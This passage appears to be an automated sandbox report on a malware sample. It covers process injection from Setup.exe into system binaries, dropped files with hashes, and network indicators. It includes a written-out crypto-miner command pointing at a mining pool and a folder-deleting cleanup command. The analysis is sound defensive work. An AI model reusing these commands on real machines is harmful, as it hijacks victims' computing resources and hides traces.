PID 4468 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 4468 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 4468 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 4468 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1984 wrote to memory of 1112 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1984 wrote to memory of 1112 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1984 wrote to memory of 1112 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1984 wrote to memory of 1112 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1984 wrote to memory of 1112 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1112 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\DAKEHIJJKE.exe
PID 1112 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\DAKEHIJJKE.exe
PID 1112 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\DAKEHIJJKE.exe
PID 1112 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\FHDHCAAKEC.exe
PID 1112 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\FHDHCAAKEC.exe
PID 1112 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\FHDHCAAKEC.exe
PID 556 wrote to memory of 2892 N/A C:\ProgramData\FHDHCAAKEC.exe C:\Windows\SysWOW64\ftp.exe
PID 556 wrote to memory of 2892 N/A C:\ProgramData\FHDHCAAKEC.exe C:\Windows\SysWOW64\ftp.exe
PID 556 wrote to memory of 2892 N/A C:\ProgramData\FHDHCAAKEC.exe C:\Windows\SysWOW64\ftp.exe
PID 4212 wrote to memory of 516 N/A C:\ProgramData\DAKEHIJJKE.exe C:\Windows\SysWOW64\ftp.exe
PID 4212 wrote to memory of 516 N/A C:\ProgramData\DAKEHIJJKE.exe C:\Windows\SysWOW64\ftp.exe
PID 4212 wrote to memory of 516 N/A C:\ProgramData\DAKEHIJJKE.exe C:\Windows\SysWOW64\ftp.exe
PID 556 wrote to memory of 2892 N/A C:\ProgramData\FHDHCAAKEC.exe C:\Windows\SysWOW64\ftp.exe
PID 4212 wrote to memory of 516 N/A C:\ProgramData\DAKEHIJJKE.exe C:\Windows\SysWOW64\ftp.exe
PID 1112 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 1112 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 1112 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 4364 wrote to memory of 2316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4364 wrote to memory of 2316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4364 wrote to memory of 2316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2892 wrote to memory of 2976 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2892 wrote to memory of 2976 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 516 wrote to memory of 4964 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 516 wrote to memory of 4964 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 516 wrote to memory of 4964 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 2892 wrote to memory of 2976 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2892 wrote to memory of 2976 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 516 wrote to memory of 4964 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 2976 wrote to memory of 4220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 2976 wrote to memory of 4220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 2976 wrote to memory of 4220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 2976 wrote to memory of 4220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 2976 wrote to memory of 4220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 2976 wrote to memory of 4220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 2976 wrote to memory of 4220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Processes

C:\Users\Admin\AppData\Local\Temp\files\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\ProgramData\DAKEHIJJKE.exe

"C:\ProgramData\DAKEHIJJKE.exe"

C:\ProgramData\FHDHCAAKEC.exe

"C:\ProgramData\FHDHCAAKEC.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGHJJDGHCBGD" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 poocoin.online udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 18.53.55.162.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 businessdownloads.ltd udp
US 172.67.212.123:443 businessdownloads.ltd tcp
US 8.8.8.8:53 123.212.67.172.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.196.193:443 i.imgur.com tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 193.196.232.199.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
FI 135.181.22.88:80 135.181.22.88 tcp
US 8.8.8.8:53 88.22.181.135.in-addr.arpa udp
FI 65.109.127.181:3333 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
FI 65.109.127.181:3333 tcp
US 8.8.8.8:53 proresupdate.com udp
US 45.152.112.146:80 proresupdate.com tcp
US 8.8.8.8:53 146.112.152.45.in-addr.arpa udp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
N/A 224.0.0.251:5353 udp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp

Files

memory/4468-0-0x00000000740F0000-0x000000007426B000-memory.dmp

memory/4468-1-0x00007FFA4F1D0000-0x00007FFA4F3C5000-memory.dmp

memory/4468-7-0x0000000074102000-0x0000000074104000-memory.dmp

memory/4468-8-0x00000000740F0000-0x000000007426B000-memory.dmp

memory/4468-9-0x00000000740F0000-0x000000007426B000-memory.dmp

memory/1984-11-0x00000000740F1000-0x00000000740FF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\81854e21

MD5 8c95448b47811c94a70ce0329f0c6eda
SHA1 fd8ee7e0db5bfe748344092ea9461b091c9d0f0d
SHA256 62d232a43bde5e16584ca85e59d35136f2a02e69d42e25ea75ada52dda05ef74
SHA512 6a61f6f17c0d8689e67991cd156e2865c3fbc31de5608fa5d75134871cfeddc5e6e900c7ccdb41bc290e809d2529ce1b3b4e5b283da265692ea9e33cb9f66db0

memory/1984-13-0x00007FFA4F1D0000-0x00007FFA4F3C5000-memory.dmp

memory/1984-16-0x00000000740F1000-0x00000000740FF000-memory.dmp

memory/1984-15-0x00000000740FE000-0x0000000074100000-memory.dmp

memory/1984-20-0x00000000740F1000-0x00000000740FF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dcom.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/1112-22-0x0000000000E90000-0x00000000015DC000-memory.dmp

memory/1112-24-0x00007FFA4F1D0000-0x00007FFA4F3C5000-memory.dmp

memory/1112-27-0x0000000000E90000-0x00000000015DC000-memory.dmp

memory/1112-28-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\ProgramData\BGHJJDGHCBGD\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\BGHJJDGHCBGD\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\DAKEHIJJKE.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

memory/4212-115-0x0000000000670000-0x0000000000B83000-memory.dmp

C:\ProgramData\FHDHCAAKEC.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/556-126-0x00000000005E0000-0x0000000000828000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6aecce3c

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/556-132-0x0000000072090000-0x000000007220B000-memory.dmp

memory/556-133-0x00007FFA4F1D0000-0x00007FFA4F3C5000-memory.dmp

memory/1112-138-0x0000000000E90000-0x00000000015DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6dbb37c9

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/4212-140-0x0000000072090000-0x000000007220B000-memory.dmp

memory/4212-141-0x00007FFA4F1D0000-0x00007FFA4F3C5000-memory.dmp

memory/1112-145-0x0000000000E90000-0x00000000015DC000-memory.dmp

memory/1112-153-0x0000000000E90000-0x00000000015DC000-memory.dmp

memory/556-156-0x0000000072090000-0x000000007220B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6d79ddac

MD5 a1a0c38f981779e33e6acbe7c553d300
SHA1 1237bd1ce4ad9a98b2c447f0359c7d98de5f5d3a
SHA256 90a61df8be7f57be9175e88b945eda04d3fa18e80801123fac83a3bfbd573527
SHA512 bf558bf40b6d08cda940e9bc4a26442f7d9693c0ccdb157a8b8256db95729454a99e10f0ed3a060d2dfbcb120cc9eb78cdc440e55a2e74004253ae439786b1fa

memory/4212-159-0x0000000072090000-0x000000007220B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\703d72be

MD5 29566029f0fa89cfdbc7a7f0e3bc482e
SHA1 9d45dc77c28f6f9415c389d2a4a57f5a99bf4a91
SHA256 6f8a3f76c1a3a04d5eb975b608b3d1cbef4e101ca98f2b685ca835c00370f28f
SHA512 a7a0e972710bb5b8eb74b982eb7c4336015432bfb6c203e6d0146b084faab7f0a84898a0278c21561bb719eaca36cb7b6affc778b93e39792b8d291c240341a7

memory/1112-164-0x0000000000E90000-0x00000000015DC000-memory.dmp

memory/2892-165-0x00007FFA4F1D0000-0x00007FFA4F3C5000-memory.dmp

memory/516-166-0x00007FFA4F1D0000-0x00007FFA4F3C5000-memory.dmp

memory/516-168-0x0000000072090000-0x000000007220B000-memory.dmp

C:\ProgramData\BGHJJDGHCBGD\VCRUNT~1.DLL

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\BGHJJDGHCBGD\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

C:\ProgramData\BGHJJDGHCBGD\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

memory/2892-182-0x0000000072090000-0x000000007220B000-memory.dmp

memory/2976-185-0x00007FFA2FDB0000-0x00007FFA31427000-memory.dmp

memory/2976-189-0x0000000000400000-0x000000000040A000-memory.dmp

memory/4220-193-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4220-197-0x000001B682B10000-0x000001B682B30000-memory.dmp

memory/4220-196-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4220-195-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4220-199-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4220-203-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4220-201-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4220-200-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4964-198-0x00007FFA4F1D0000-0x00007FFA4F3C5000-memory.dmp

memory/4220-202-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4964-204-0x00000000005E0000-0x0000000000651000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240226-en

Max time kernel

136s

Max time network

146s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\ATKEX.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1108 wrote to memory of 2264 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1108 wrote to memory of 2264 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1108 wrote to memory of 2264 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\ATKEX.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\ATKEX.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5164 --field-trial-handle=3084,i,4016110471176367543,14287608422419064331,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 159.185.200.23.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win7-20240419-en

Max time kernel

119s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\vcruntime140_app.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2320 wrote to memory of 1044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2320 wrote to memory of 1044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2320 wrote to memory of 1044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2320 wrote to memory of 1044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2320 wrote to memory of 1044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2320 wrote to memory of 1044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2320 wrote to memory of 1044 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1044 wrote to memory of 2496 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 1044 wrote to memory of 2496 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 1044 wrote to memory of 2496 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe
PID 1044 wrote to memory of 2496 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\vcruntime140_app.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\vcruntime140_app.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 220

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\vcruntime140_app.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1040 wrote to memory of 4376 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1040 wrote to memory of 4376 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1040 wrote to memory of 4376 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\vcruntime140_app.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\vcruntime140_app.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4376 -ip 4376

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240226-en

Max time kernel

141s

Max time network

158s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-processthreads-l1-1-1.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-processthreads-l1-1-1.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3948 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.200.10:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 pki.goog udp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 10.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 29.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

150s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-string-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-string-l1-1-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240611-en

Max time kernel

125s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-timezone-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-timezone-l1-1-0.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3708,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240508-en

Max time kernel

124s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-util-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-util-l1-1-0.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

